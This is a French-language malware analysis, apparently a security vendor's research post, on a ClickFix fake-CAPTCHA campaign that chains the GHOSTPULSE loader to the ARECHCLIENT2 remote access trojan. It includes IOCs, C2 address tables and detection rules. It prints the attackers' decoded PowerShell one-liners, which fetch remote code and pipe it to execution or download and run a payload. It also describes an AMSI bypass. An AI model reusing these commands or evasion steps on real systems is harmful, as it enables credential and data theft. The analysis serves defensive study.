Préambule
Elastic Security Labs a constaté que la technique ClickFix gagnait en popularité pour les campagnes en plusieurs étapes qui diffusent divers logiciels malveillants par le biais de tactiques d'ingénierie sociale.
Nos renseignements sur les menaces indiquent une augmentation substantielle de l'activité utilisant ClickFix(technique observée pour la première fois) comme principal vecteur d'accès initial. Cette technique d'ingénierie sociale incite les utilisateurs à copier et coller un PowerShell malveillant qui entraîne l'exécution d'un logiciel malveillant. Notre télémétrie a suivi son utilisation depuis l'année dernière, y compris les cas qui ont conduit au déploiement de nouvelles versions du chargeur GHOSTPULSE. Cela a conduit à des campagnes ciblant un large public à l'aide de logiciels malveillants et de voleurs d'informations, tels que LUMMA et ARECHCLIENT2, une famille observée pour la première fois à l'adresse 2019 , mais qui connaît aujourd'hui un regain de popularité important.
Ce billet examine une campagne récente de ClickFix et fournit une analyse approfondie de ses composantes, des techniques employées et des logiciels malveillants qu'elle finit par produire.
Principaux points abordés dans cet article
- ClickFix : Reste une méthode d'accès initial très efficace et répandue.
- GHOSTPULSE : continue d'être largement utilisé comme chargeur à plusieurs étages, avec un développement continu de nouveaux modules et des techniques d'évasion améliorées. Notamment, sa configuration initiale est livrée dans un fichier crypté.
- ARECHCLIENT2 (SECTOPRAT) : A connu une augmentation considérable des activités malveillantes au cours de l'année 2025.
L'accroche initiale : Déconstruction de l'ingénierie sociale de ClickFix
Toute attaque réussie en plusieurs étapes commence par un point d'appui et, dans de nombreuses campagnes récentes, cette première étape a été franchie par ClickFix. ClickFix s'appuie sur la psychologie humaine, transformant des interactions apparemment inoffensives avec les utilisateurs en une véritable rampe de lancement pour la compromission.
Au fond, ClickFix est une technique d'ingénierie sociale conçue pour manipuler les utilisateurs afin qu'ils exécutent par inadvertance un code malveillant sur leurs systèmes. Il exploite les comportements en ligne courants et les tendances psychologiques, en présentant aux utilisateurs des messages trompeurs, souvent déguisés en mises à jour du navigateur, en erreurs système ou même en vérifications CAPTCHA. L'astuce est simple mais incroyablement efficace : au lieu d'un téléchargement direct, l'utilisateur est invité à copier un fichier apparemment inoffensif "fix" (qui est une commande PowerShell malveillante) et à le coller directement dans la boîte de dialogue d'exécution de son système d'exploitation. Cette action apparemment volontaire contourne de nombreuses défenses périmétriques traditionnelles, car c'est l'utilisateur qui est à l'origine du processus.
ClickFix est apparu pour la première fois dans le paysage des menaces en mars 2024, mais il a rapidement gagné du terrain, explosant en prévalence tout au long de 2024 et poursuivant son ascension agressive en 2025. Son efficacité réside dans l'exploitation de la lassitude de la vérification "" - l'habitude subconsciente que prennent les utilisateurs de cliquer sans réfléchir sur les contrôles de sécurité. Lorsqu'ils sont confrontés à un CAPTCHA à l'aspect familier ou à un bouton urgent "fix it", de nombreux utilisateurs, conditionnés par la routine, se contentent d'obtempérer sans examiner la demande sous-jacente. Cela fait de ClickFix un vecteur d'accès initial incroyablement puissant, favorisé par un large éventail d'acteurs de la menace en raison de son taux de réussite élevé dans la violation des défenses initiales.
Notre récente recherche Elastic Security sur EDDIESTEALER fournit un autre exemple concret de l'efficacité de ClickFix pour faciliter le déploiement de logiciels malveillants, soulignant encore sa polyvalence et son adoption généralisée dans le paysage des menaces.
Notre télémétrie interne chez Elastic corrobore cette tendance, montrant un volume significatif d'alertes liées à ClickFix dans nos environnements observés, en particulier au cours du premier trimestre 2025. Nous avons constaté une augmentation des tentatives par rapport au trimestre précédent, avec un accent prédominant sur le déploiement de logiciels malveillants d'infection de masse, tels que les RAT et les InfoStealers.
Le parcours d'une campagne ClickFix vers ARECHCLIENT2
La technique ClickFix constitue souvent l'étape initiale d'une attaque plus vaste, en plusieurs étapes. Nous avons récemment analysé une campagne qui illustre clairement cette progression. Cette opération commence par un leurre ClickFix, qui incite les utilisateurs à lancer le processus d'infection. Après avoir obtenu un accès initial, la campagne déploie une version mise à jour du GHOSTPULSE Loader (également connu sous le nom de HIJACKLOADER, IDATLOADER). Ce chargeur fait ensuite intervenir un chargeur .NET intermédiaire. Cette étape supplémentaire est responsable de la livraison de la charge utile finale : un échantillon ARECHCLIENT2(SECTOPRAT), chargé directement dans la mémoire. Cette chaîne d'attaque particulière montre comment les adversaires combinent l'ingénierie sociale avec des capacités de chargement cachées et des couches d'exécution multiples pour voler des données et prendre le contrôle à distance en fin de compte.
Nous avons observé cette campagne exacte dans notre télémétrie le , ce qui nous donne un aperçu direct de son exécution dans le monde réel et de la séquence de ses composants.
Analyse technique de l'infection
La chaîne d'infection commence par une page de phishing qui imite une vérification Captcha anti-DDoS de Cloudflare.
Nous avons observé deux infrastructures (résolvant toutes deux à 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ et https://clients[.]contology[.]com/captcha/ qui fournissent la même charge utile initiale.
L'interaction de l'utilisateur sur cette page déclenche l'exécution. GHOSTPULSE sert de chargeur de logiciels malveillants dans cette campagne. Elastic Security Labs a suivi de près ce chargeur, et nos recherches précédentes(2023 et 2024) ont fourni un aperçu détaillé de ses capacités initiales.
La page web est un script JavaScript fortement obscurci qui génère le code HTML et le JavaScript, qui copie une commande PowerShell dans le presse-papiers.
En inspectant le code HTML d'exécution dans un navigateur, nous pouvons voir le premier plan de la page, mais pas le script qui est exécuté après avoir cliqué sur la case à cocher. Verify you are human.
Une solution simple consiste à l'exécuter dans un débogueur pour récupérer les informations pendant l'exécution. Le second code JS est obscurci, mais nous pouvons facilement identifier deux fonctions intéressantes. La première fonction, runClickedCheckboxEffects, récupère l'adresse IP publique de la machine en interrogeant https://api.ipify[.]org?format=json,, puis envoie l'adresse IP à l'infrastructure de l'attaquant, https://koonenmagaziner[.]click/counter/<IP_address>,, pour enregistrer l'infection.
La deuxième fonction copie une commande PowerShell codée en base64 dans le presse-papiers.
Lequel est le suivant lorsqu'il est décodé en base64
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iexLorsqu'il est exécuté, il récupère le script PowerShell suivant :
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"Le processus d'infection observé pour cette campagne implique le déploiement de GHOSTPULSE de la manière suivante : Après que l'utilisateur a exécuté la commande PowerShell copiée par ClickFix, le script initial récupère et exécute des commandes supplémentaires. Ces commandes PowerShell téléchargent un fichier ZIP (ComponentStyle.zip) à partir d'un emplacement distant et l'extraient ensuite dans un répertoire temporaire sur le système de la victime.
Le contenu extrait comprend des composants pour GHOSTPULSE, en particulier un exécutable bénin (Crysta_X64.exe) et une bibliothèque de liens dynamiques malveillante (DllXDownloadManager.dll). Cette configuration utilise la technique du sideloading de DLL, selon laquelle l'exécutable légitime charge la DLL malveillante. Le fichier (Heeschamjet.rc) est le fichier IDAT qui contient les charges utiles de l'étape suivante dans un format crypté.
et le fichier Shonomteak.bxi, qui est crypté et utilisé par le chargeur pour récupérer l'étape 2 et la structure de configuration.
GHOSTPULSE
Étape 1
GHOSTPULSE est un logiciel malveillant datant de 2023. Il a continuellement reçu de nombreuses mises à jour, y compris une nouvelle façon de stocker sa charge utile chiffrée dans une image en incorporant la charge utile dans les pixels du PNG, comme détaillé dans le billet de blog de recherche d'Elastic 2024 , et de nouveaux modules de recherche de Zscaler.
Le logiciel malveillant utilisé dans cette campagne a été livré avec un fichier crypté supplémentaire nommé Shonomteak.bxi. Au cours de l'étape 1 du chargeur, il décrypte le fichier à l'aide d'une opération d'addition de DWORD avec une valeur stockée dans le fichier lui-même.
Le logiciel malveillant extrait ensuite le code de l'étape 2 du fichier décrypté Shonomteak.bxi et l'injecte dans une bibliothèque chargée à l'aide de la fonction LibraryLoadA. Le nom de la bibliothèque est stocké dans le même fichier décrypté ; dans notre cas, il s'agit de vssapi.dll.
La fonction stage 2 est alors appelée avec un paramètre de structure contenant le nom du fichier IDAT PNG, la configuration stage 2 qui se trouvait dans le fichier décrypté Shonomteak.bxi, et un champ booléen b_detect_process défini à True dans notre cas.
Étape 2
Lorsque le champ booléen b_detect_process est défini sur True, le logiciel malveillant exécute une fonction qui vérifie une liste de processus pour voir s'ils sont en cours d'exécution. Si un processus est détecté, l'exécution est retardée de 5 secondes.
Dans les échantillons précédents, nous avons analysé GHOSTPULSE, dont la configuration était codée en dur directement dans le binaire. Cet échantillon, en revanche, contient toutes les informations nécessaires au bon fonctionnement du logiciel malveillant, stockées à l'adresse Shonomteak.bxi,, notamment :
- Hachures pour les noms de DLL et les API Windows
- Balise IDAT : utilisée pour trouver le début des données cryptées dans le fichier PNG
- Chaîne IDAT : qui est simplement "IDAT"
- Hachures des processus à rechercher
Dernières réflexions sur GHOSTPULSE
GHOSTPULSE a fait l'objet de nombreuses mises à jour. L'utilisation de la méthode de l'en-tête IDAT pour stocker la charge utile cryptée, plutôt que la nouvelle méthode que nous avons découverte en 2024, qui utilise des pixels pour stocker la charge utile, peut indiquer que le constructeur de cette famille a conservé les deux options pour compiler de nouveaux échantillons.
Notre extracteur de configuration effectue l'extraction de la charge utile en utilisant les deux méthodes et peut être utilisé pour l'analyse de masse des échantillons. Vous pouvez trouver l'outil mis à jour dans notre dépôt labs-releases.
ARECHCLIENT2
En 2025, une augmentation notable de l'activité impliquant ARECHCLIENT2 (SectopRAT) a été observée. Cet outil d'accès à distance .NET lourdement obfusqué, initialement identifié en novembre 2019 et connu pour ses fonctionnalités de vol d'informations, est désormais déployé par GHOSTPULSE via la technique d'ingénierie sociale Clickfix. Nos recherches antérieures ont montré que le déploiement initial de GHOSTPULSE utilisant ARECHCLIENT2 a eu lieu vers 2023.
La charge utile déployée par GHOSTPULSE dans un processus nouvellement créé est un chargeur .NET natif x86, qui charge à son tour ARECHCLIENT2.
Le chargeur passe par les étapes suivantes : 3 :
- Patching AMSI
- Extraction et décryptage de la charge utile
- Chargement du CLR, puis chargement réfléchi de ARECHCLIENT2
Il est intéressant de noter que la gestion des erreurs à des fins de débogage est toujours présente, sous la forme de boîtes de message utilisant l'API MessageBoxA. Par exemple, lorsque la section .tls n'est pas trouvée, une boîte de message d'erreur contenant la chaîne "D1" est affichée.
Vous trouverez ci-dessous un tableau de tous les messages d'erreur et leur description :
| Message | Description |
|---|---|
| F1 | LoadLibraryExW échec de l'accrochage |
| F2 | Échec du patching AMSI |
| D1 | Impossible de trouver la section .tls |
| W2 | Échec du chargement du CLR |
Le logiciel malveillant crée un crochet sur l'API LoadLibraryExW. Ce crochet attend que amsi.dll soit chargé, puis place un autre crochet sur AmsiScanBuffer 0, contournant ainsi AMSI.
Ensuite, le chargeur récupère le pointeur en mémoire vers la section .tls en analysant les en-têtes PE. Les premiers octets de cette section ( 0x40 ) servent de clé XOR, et le reste des octets contient l'échantillon crypté ARECHCLIENT2, que le chargeur décrypte ensuite.
Enfin, il charge le Common Language Runtime (CLR) .NET en mémoire avec l'API Windows CLRCreateInstance avant de charger par réflexion ARECHCLIENT2. Vous trouverez ci-dessous un exemple de la manière dont elle est effectuée.
ARECHCLIENT2 est un puissant cheval de Troie d'accès à distance et un voleur d'informations, conçu pour cibler un large éventail de données utilisateur sensibles et d'informations système. Les objectifs principaux de la malveillance sont principalement axés sur :
- Vol de données d'identification et de données financières : ARECHCLIENT2 cible explicitement les portefeuilles de crypto-monnaies, les mots de passe enregistrés dans les navigateurs, les cookies et les données de remplissage automatique. Il vise également les identifiants FTP, VPN, Telegram, Discord et Steam.
- Profilage et reconnaissance du système : ARECHCLIENT2 recueille des informations détaillées sur le système, notamment la version du système d'exploitation, des informations sur le matériel, l'adresse IP, le nom de la machine et la géolocalisation (ville, pays et fuseau horaire).
- Exécution de commandes : ARECHCLIENT2 reçoit et exécute des commandes de son serveur de commande et de contrôle (C2), ce qui permet aux attaquants de prendre le contrôle à distance des systèmes infectés.
Le logiciel malveillant ARECHCLIENT2 se connecte à son C2 144.172.97[.]2, qui est codé en dur dans le binaire sous la forme d'une chaîne cryptée, et récupère également son IP C2 secondaire (143.110.230[.]167) à partir d'un lien pastebin codé en dur https://pastebin[.]com/raw/Wg8DHh2x.
Analyse de l'infrastructure
La page captcha malveillante était hébergée sous deux domaines clients.dealeronlinemarketing[.]com et clients.contology[.]com sous l'URI /captcha et /Client pointant vers l'adresse IP suivante 50.57.243[.]90.
Nous avons identifié que les deux entités sont liées à une agence de publicité numérique ayant une longue histoire opérationnelle. Une enquête plus approfondie révèle que la société a constamment utilisé les sous-domaines des clients pour héberger divers contenus, y compris des PDF et des formulaires, à des fins publicitaires.
Nous estimons que l'attaquant a probablement compromis le serveur 50.57.243[.]90 et qu'il en tire parti en exploitant l'infrastructure existante de l'entreprise et sa portée publicitaire pour faciliter une activité malveillante de grande envergure.
En aval de la chaîne d'attaque, l'analyse des adresses IP C2 d'ARECHCLIENT2 (143.110.230[.]167 et 144.172.97[.]2) a révélé l'existence d'une infrastructure de campagne supplémentaire. Les deux serveurs sont hébergés sur des systèmes autonomes différents, AS14061 et AS14956.
En se basant sur le hachage d'une bannière partagée(de @ValidinLLC, HOST-BANNER_0_HASHqui est la valeur de hachage des bannières de réponse du serveur web), on a découvert 120 serveurs uniques dans toute une série de systèmes autonomes au cours des sept derniers mois. Sur ces 120, 19 a été précédemment étiqueté par divers autres fournisseurs comme "Sectop RAT" (aka ARECHCLIENT2) comme documenté dans le repo de Maltrail.
Les validations ciblées des dernières occurrences (première occurrence après juin 1, 2025) par rapport à VirusTotal montrent que les membres de la communauté ont précédemment étiqueté tous les 13 comme Sectop RAT C2.
Tous ces serveurs ont des configurations similaires :
- Exécution de Canonical Linux
- SSH sur
22 - TCP inconnu sur
443 - Nginx HTTP sur
8080, et - HTTP sur
9000(port C2)
Le service sur le port 9000 a des en-têtes de serveur Windows, alors que les services SSH et NGINX HTTP spécifient tous deux Ubuntu comme système d'exploitation. Cela suggère un proxy inverse du C2 pour protéger le serveur réel en maintenant des redirecteurs frontaux jetables.
ARECHCLIENT2 IOC :
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
Il s'agit d'une campagne active, et cette infrastructure a été construite et démolie à un rythme élevé au cours des sept derniers mois. Au moment de la publication, les nœuds C2 suivants sont toujours actifs :
| Value | First Seen | Vu en dernier |
|---|---|---|
66.63.187.22 | 2025-06-15 | 2025-06-15 |
45.94.47.164 | 2025-06-02 | 2025-06-15 |
84.200.17.129 | 2025-06-04 | 2025-06-15 |
82.117.255.225 | 2025-03-14 | 2025-06-15 |
45.77.154.115 | 2025-06-05 | 2025-06-15 |
144.172.94.120 | 2025-05-20 | 2025-06-15 |
79.124.62.10 | 2025-05-15 | 2025-06-15 |
82.117.242.178 | 2025-03-14 | 2025-06-15 |
195.82.147.132 | 2025-04-10 | 2025-06-15 |
62.60.247.154 | 2025-05-18 | 2025-06-15 |
91.199.163.74 | 2025-04-03 | 2025-06-15 |
172.86.72.81 | 2025-03-13 | 2025-06-15 |
107.189.24.67 | 2025-06-02 | 2025-06-15 |
143.110.230.167 | 2025-06-08 | 2025-06-15 |
185.156.72.80 | 2025-05-15 | 2025-06-15 |
85.158.110.179 | 2025-05-11 | 2025-06-15 |
144.172.101.228 | 2025-05-13 | 2025-06-15 |
192.124.178.244 | 2025-06-01 | 2025-06-15 |
107.189.18.56 | 2025-04-27 | 2025-06-15 |
194.87.29.62 | 2025-05-18 | 2025-06-15 |
185.156.72.63 | 2025-06-12 | 2025-06-12 |
193.149.176.31 | 2025-06-08 | 2025-06-12 |
45.141.87.249 | 2025-06-12 | 2025-06-12 |
176.126.163.56 | 2025-05-06 | 2025-06-12 |
185.156.72.71 | 2025-05-15 | 2025-06-12 |
91.184.242.37 | 2025-05-15 | 2025-06-12 |
45.141.86.159 | 2025-05-15 | 2025-06-12 |
67.220.72.124 | 2025-06-05 | 2025-06-12 |
45.118.248.29 | 2025-01-28 | 2025-06-12 |
172.105.148.233 | 2025-06-03 | 2025-06-10 |
194.26.27.10 | 2025-05-06 | 2025-06-10 |
45.141.87.212 | 2025-06-08 | 2025-06-08 |
45.141.86.149 | 2025-05-15 | 2025-06-08 |
172.235.190.176 | 2025-06-08 | 2025-06-08 |
45.141.86.82 | 2024-12-13 | 2025-06-08 |
45.141.87.7 | 2025-05-13 | 2025-06-06 |
185.125.50.140 | 2025-04-06 | 2025-06-03 |
Conclusion
Cette cybercampagne en plusieurs étapes utilise efficacement l'ingénierie sociale ClickFix pour l'accès initial, le déploiement du chargeur GHOSTPULSE pour fournir un chargeur .NET intermédiaire, pour finalement aboutir à la charge utile ARECHCLIENT2 résidant en mémoire . Cette chaîne d'attaque à plusieurs niveaux permet de recueillir des informations d'identification, des données financières et des données système complètes, tout en donnant aux attaquants la possibilité de prendre le contrôle à distance des machines compromises.
MITRE ATT&CK
Elastic utilise le cadre MITRE ATT& CK pour documenter les tactiques, techniques et procédures communes que les menaces persistantes avancées utilisent contre les réseaux d'entreprise.
Tactiques
Les tactiques représentent le pourquoi d'une technique ou d'une sous-technique. Il s'agit de l'objectif tactique de l'adversaire : la raison pour laquelle il effectue une action.
Techniques
Les techniques représentent la manière dont un adversaire atteint un objectif tactique en effectuant une action.
- Phishing
- Interprète de script et de commande
- DLL Sideloading
- Chargement réflexif
- Interaction avec l'utilisateur
- Transfert d'outils d'infiltration
- Recherche d'informations sur le système
- Découverte du processus
- Vol de cookie de session web
Détection de [malware]
Détection
Elastic Defend détecte cette menace avec les règles de protection du comportement suivantes :
- Exécution suspecte d'un shell de commande via Windows Run
- Requête DNS vers un domaine de premier niveau suspect
- Chargement par la bibliothèque d'un fichier écrit par un mandataire binaire signé
- Connexion à un service Web par un proxy binaire signé
- Découverte potentielle d'informations sur le navigateur
YARA
Observations
Les observables suivants ont été examinés dans le cadre de cette recherche.
| Observable | Type | Nom | Référence |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | Domain | Sous-domaine Captcha | |
clients.contology[.]com | Domain | Sous-domaine Captcha | |
koonenmagaziner[.]click | Domain | ||
50.57.243[.]90 | ipv4-addr | clients.dealeronlinemarketing[.]com & clients.contology[.]com Adresse IP | |
144.172.97[.]2 | ipv4-addr | ARECHCLIENT2 C&Serveur C | |
143.110.230[.]167 | ipv4-addr | ARECHCLIENT2 C&Serveur C | |
pastebin[.]com/raw/Wg8DHh2x | ipv4-addr | Contient ARECHCLIENT2 C&C server IP | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG GHOSTPULSE |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | CHARGEUR DOTNET | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | ARECHCLIENT2 |
Références
Les éléments suivants ont été référencés tout au long de la recherche ci-dessus :